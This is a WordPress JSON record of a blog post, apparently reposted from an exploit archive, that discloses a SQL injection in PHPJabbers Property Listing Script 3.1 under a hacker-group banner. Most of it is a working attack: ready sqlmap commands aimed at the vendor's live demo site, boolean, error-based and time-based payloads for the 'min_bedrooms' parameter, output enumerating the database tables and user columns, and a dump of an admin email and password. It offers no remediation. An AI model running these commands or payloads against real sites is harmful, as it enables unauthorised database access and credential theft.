{"id":27201,"date":"2022-07-18T21:20:03","date_gmt":"2022-07-18T17:20:03","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167757\/pls31-sql.txt"},"modified":"2022-07-20T08:52:02","modified_gmt":"2022-07-20T04:22:02","slug":"property-listing-script-3-1-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/property-listing-script-3-1-sql-injection\/","title":{"rendered":"Property Listing Script 3.1 SQL Injection"},"content":{"rendered":"

\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u2502\u2502 C r a C k E r \u250c\u2518
\n\u250c\u2518 T H E C R A C K O F E T E R N A L M I G H T \u2502\u2502
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

\u250c\u2500\u2500\u2500\u2500 From The Ashes and Dust Rises An Unimaginable crack…. \u2500\u2500\u2500\u2500\u2510
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 [ Exploits ] \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518
\n: Author : CraCkEr \u2502 \u2502 :
\n\u2502 Website : phpjabbers.com \u2502 \u2502 \u2502
\n\u2502 Vendor : PHPJABBERS \u2502 \u2502 Property Listing Script \u2502
\n\u2502 Software : Property Listing Script 3.1 \u2502 \u2502 \u2502
\n\u2502 Vuln Type: Remote SQL Injection \u2502 \u2502 Script will give you \u2502
\n\u2502 Method : GET \u2502 \u2502 the tools to efficiently manage \u2502
\n\u2502 Critical : High [\u2591\u2591\u2592\u2592\u2593\u2593\u2588\u2588] \u2502 \u2502 your own real estate portal \u2502
\n\u2502 Impact : Database Access \u2502 \u2502 \u2502
\n\u2502 \u2502 \u2502 \u2502
\n\u2502 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2502
\n\u2502 B4nks-NET irc.b4nks.tk #unix \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518
\n: :
\n\u2502 Release Notes: \u2502
\n\u2502 \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550 \u2502
\n\u2502 Typically used for remotely exploitable vulnerabilities that can lead to \u2502
\n\u2502 system compromise. \u2502
\n\u2502 \u2502
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

Greets:
\nPhr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
\nloool, DevS, Dark-Gost
\nCryptoJob (Twitter) twitter.com\/CryptozJob
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 \u00a9 CraCkEr 2022 \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

Live Demo Site:<\/p>\n

https:\/\/www.phpjabbers.com\/property-listing-script\/#sectionDemo<\/p>\n

[INFO] GET parameter ‘min_bedrooms’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
\nGET parameter ‘min_bedrooms’ is vulnerable.<\/p>\n

sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests:<\/p>\n


\nParameter: min_bedrooms (GET)
\nType: boolean-based blind
\nTitle: AND boolean-based blind – WHERE or HAVING clause
\nPayload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759<\/p>\n

Type: error-based
\nTitle: MySQL >= 5.6 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
\nPayload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861
\n—<\/p>\n

sqlmap.py -u “https:\/\/demo.phpjabbers.com\/1657921261_148\/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1” –current-db –batch –random-agent –threads 5<\/p>\n

[INFO] the back-end DBMS is MySQL
\nweb server operating system: Linux CentOS 6
\nweb application technology: Apache 2.2.15
\nback-end DBMS: MySQL >= 5.6
\n[01:13:36] [INFO] fetching current database
\n[01:13:36] [INFO] retrieved: ‘pjabbers_demo_pls’
\ncurrent database: ‘pjabbers_demo_pls’<\/p>\n

sqlmap.py -u “https:\/\/demo.phpjabbers.com\/1657921261_148\/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1” -D pjabbers_demo_pls –tables –batch –random-agent<\/p>\n


\nParameter: min_bedrooms (GET)
\nType: boolean-based blind
\nTitle: AND boolean-based blind – WHERE or HAVING clause
\nPayload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759<\/p>\n

Type: error-based
\nTitle: MySQL >= 5.6 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
\nPayload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861
\n—<\/p>\n

[INFO] the back-end DBMS is MySQL
\nweb server operating system: Linux CentOS 6
\nweb application technology: Apache 2.2.15
\nback-end DBMS: MySQL >= 5.6
\nDatabase: pjabbers_demo_pls<\/p>\n

[66 tables]\n+—————————————————————-+
\n| 1657528735_303_pls_30_property_listing_features |
\n| 1657528735_303_pls_30_property_listing_fields |
\n| 1657528735_303_pls_30_property_listing_multi_lang |
\n| 1657528735_303_pls_30_property_listing_options |
\n| 1657528735_303_pls_30_property_listing_passwords |
\n| 1657528735_303_pls_30_property_listing_payments |
\n| 1657528735_303_pls_30_property_listing_periods |
\n| 1657528735_303_pls_30_property_listing_plugin_country |
\n| 1657528735_303_pls_30_property_listing_plugin_galleries_set |
\n| 1657528735_303_pls_30_property_listing_plugin_gallery |
\n| 1657528735_303_pls_30_property_listing_plugin_locale_languages |
\n| 1657528735_303_pls_30_property_listing_plugin_locale |
\n| 1657528735_303_pls_30_property_listing_plugin_log_config |
\n| 1657528735_303_pls_30_property_listing_plugin_log |
\n| 1657528735_303_pls_30_property_listing_plugin_one_admin |
\n| 1657528735_303_pls_30_property_listing_plugin_paypal |
\n| 1657528735_303_pls_30_property_listing_plugin_sms |
\n| 1657528735_303_pls_30_property_listing_properties_features |
\n| 1657528735_303_pls_30_property_listing_properties |
\n| 1657528735_303_pls_30_property_listing_roles |
\n| 1657528735_303_pls_30_property_listing_types |
\n| 1657528735_303_pls_30_property_listing_users |
\n| 1657921261_148_pls_30_property_listing_features |
\n| 1657921261_148_pls_30_property_listing_fields |
\n| 1657921261_148_pls_30_property_listing_multi_lang |
\n| 1657921261_148_pls_30_property_listing_options |
\n| 1657921261_148_pls_30_property_listing_passwords |
\n| 1657921261_148_pls_30_property_listing_payments |
\n| 1657921261_148_pls_30_property_listing_periods |
\n| 1657921261_148_pls_30_property_listing_plugin_country |
\n| 1657921261_148_pls_30_property_listing_plugin_galleries_set |
\n| 1657921261_148_pls_30_property_listing_plugin_gallery |
\n| 1657921261_148_pls_30_property_listing_plugin_locale_languages |
\n| 1657921261_148_pls_30_property_listing_plugin_locale |
\n| 1657921261_148_pls_30_property_listing_plugin_log_config |
\n| 1657921261_148_pls_30_property_listing_plugin_log |
\n| 1657921261_148_pls_30_property_listing_plugin_one_admin |
\n| 1657921261_148_pls_30_property_listing_plugin_paypal |
\n| 1657921261_148_pls_30_property_listing_plugin_sms |
\n| 1657921261_148_pls_30_property_listing_properties_features |
\n| 1657921261_148_pls_30_property_listing_properties |
\n| 1657921261_148_pls_30_property_listing_roles |
\n| 1657921261_148_pls_30_property_listing_types |
\n| 1657921261_148_pls_30_property_listing_users |
\n| pls_30_property_listing_features |
\n| pls_30_property_listing_fields |
\n| pls_30_property_listing_multi_lang |
\n| pls_30_property_listing_options |
\n| pls_30_property_listing_passwords |
\n| pls_30_property_listing_payments |
\n| pls_30_property_listing_periods |
\n| pls_30_property_listing_plugin_country |
\n| pls_30_property_listing_plugin_galleries_set |
\n| pls_30_property_listing_plugin_gallery |
\n| pls_30_property_listing_plugin_locale |
\n| pls_30_property_listing_plugin_locale_languages |
\n| pls_30_property_listing_plugin_log |
\n| pls_30_property_listing_plugin_log_config |
\n| pls_30_property_listing_plugin_one_admin |
\n| pls_30_property_listing_plugin_paypal |
\n| pls_30_property_listing_plugin_sms |
\n| pls_30_property_listing_properties |
\n| pls_30_property_listing_properties_features |
\n| pls_30_property_listing_roles |
\n| pls_30_property_listing_types |
\n| pls_30_property_listing_users |
\n+—————————————————————-+<\/p>\n

sqlmap.py -u “https:\/\/demo.phpjabbers.com\/1657921261_148\/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1” -D pjabbers_demo_pls -T pls_30_property_listing_users –columns –batch –random-agent<\/p>\n

fetching columns for table ‘pls_30_property_listing_users’ in database ‘pjabbers_demo_pls’<\/p>\n

Database: pjabbers_demo_pls
\nTable: pls_30_property_listing_users<\/p>\n

[12 columns]\n+————+——————+
\n| Column | Type |
\n+————+——————+
\n| created | datetime |
\n| email | varchar(255) |
\n| fax | varchar(255) |
\n| id | int(10) unsigned |
\n| ip | varchar(15) |
\n| is_active | enum(‘T’,’F’) |
\n| last_login | datetime |
\n| name | varchar(255) |
\n| password | blob |
\n| phone | varchar(255) |
\n| role_id | int(10) unsigned |
\n| status | enum(‘T’,’F’) |
\n+————+——————+<\/p>\n

sqlmap.py -u “https:\/\/demo.phpjabbers.com\/1657921261_148\/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1” -D pjabbers_demo_pls -T pls_30_property_listing_users -C email,password –dump –batch –random-agent<\/p>\n

fetching entries of column(s) ’email,password’ for table ‘pls_30_property_listing_users’ in database ‘pjabbers_demo_pls’<\/p>\n

Database: pjabbers_demo_pls
\nTable: pls_30_property_listing_users<\/p>\n

[1 entry]\n+—————–+———-+
\n| email | password |
\n+—————–+———-+
\n| admin@admin.com | P@S13rd |
\n+—————–+———-+<\/p>\n

[-] Done<\/p>\n","protected":false},"excerpt":{"rendered":"

\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502\u2502 C r a C k E r \u250c\u2518 \u250c\u2518 T H E C R A C K O F E T E R N A L M I G H T \u2502\u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518 \u250c\u2500\u2500\u2500\u2500 From The Ashes and Dust Rises An Unimaginable crack…. \u2500\u2500\u2500\u2500\u2510 \u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2518 [ Exploits ] \u250c\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518 : Author …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-27201","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27201","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=27201"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27201\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=27201"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=27201"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=27201"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}